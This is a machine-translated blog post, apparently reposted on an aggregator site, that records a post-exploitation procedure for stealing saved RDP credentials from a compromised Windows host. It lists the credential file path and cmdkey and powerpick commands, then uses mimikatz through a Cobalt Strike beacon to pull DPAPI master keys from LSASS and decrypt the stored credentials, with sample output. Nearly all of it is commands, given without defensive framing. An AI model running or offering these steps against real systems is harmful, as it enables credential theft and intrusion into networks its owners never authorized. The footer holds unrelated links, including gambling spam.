[Within the network penetration] get remote host RDP credentials saved passwords

Others 2020-01-18 22:03:24 views: null

Here only records not explain

Windows directory is saved RDP credentials:

C:\Users\用户名\AppData\Local\Microsoft\Credentials

Available through the command line, execute:

cmdkey /list或powerpick Get-ChildItem C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ -Force

Note: cmdkey / list command Always perform under Session session, under the system perform without result.

Using cobalt strike in mimikatz can use to get next part of masterkey and pbData:

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID

Output should look like:

**BLOB**
  dwVersion : 00000001 - 1
  guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
  dwFlags : 20000000 - 536870912 (system ; )
  dwDescriptionLen : 00000012 - 18
  szDescription : 本地凭据数据

  algCrypt : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen : 00000100 - 256
  dwSaltLen : 00000020 - 32
  pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f
  dwHmacKeyLen : 00000000 - 0
  pbHmackKey :
  algHash : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen : 00000200 - 512
  dwHmac2KeyLen : 00000020 - 32
  pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233
  dwDataLen : 000000c0 - 192
  pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
  dwSignLen : 00000040 - 64
  pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655

Concern is guidMasterKey, pbData, pbData is we have to decrypt the data, guidMasterKey is the key needed to decrypt it.

Here there has been LSASS this key in its cache so we can use SeDebugPrivilege get:

beacon> mimikatz !sekurlsa::dpapi

[00000001]
     * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
     * Time : 2020/1/3 8:05:02
     * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
     * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322
     [00000002]
     * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}
     * Time : 2020/1/3 8:05:02
     * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
     * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb

Then save credentials to the local, execute:

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"

Guess you like

Origin www.cnblogs.com/-mo-/p/12210302.html
Recommended
Ranking
Empire cms smart tag calls four first-level recommended articles, starting from the fourth article
Linux environment installation and configuration Elasticsearch7.17
Big Data processing architecture and Lambda Kappa architecture
Explore the top of the AI large model platform - Wenxin Qianfan
Beijing car PK10 lucky airship Guanya size and value of the odd and even tips
W3B x Sui Hacker House|In-depth understanding of Sui and Move language
Know almost Ko Chan: Chinese what any decent open source software products? (Finishing from my original answer)
Comprehensively improve AD domain security authentication | Zhuyun IDaaS
Android Update Engine Analysis (24) What happened when making the downgrade package?
Spark Architecture and Operating Mechanism (1) - System Architecture
Daily
More
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)

Code World

© 2018 codetd.com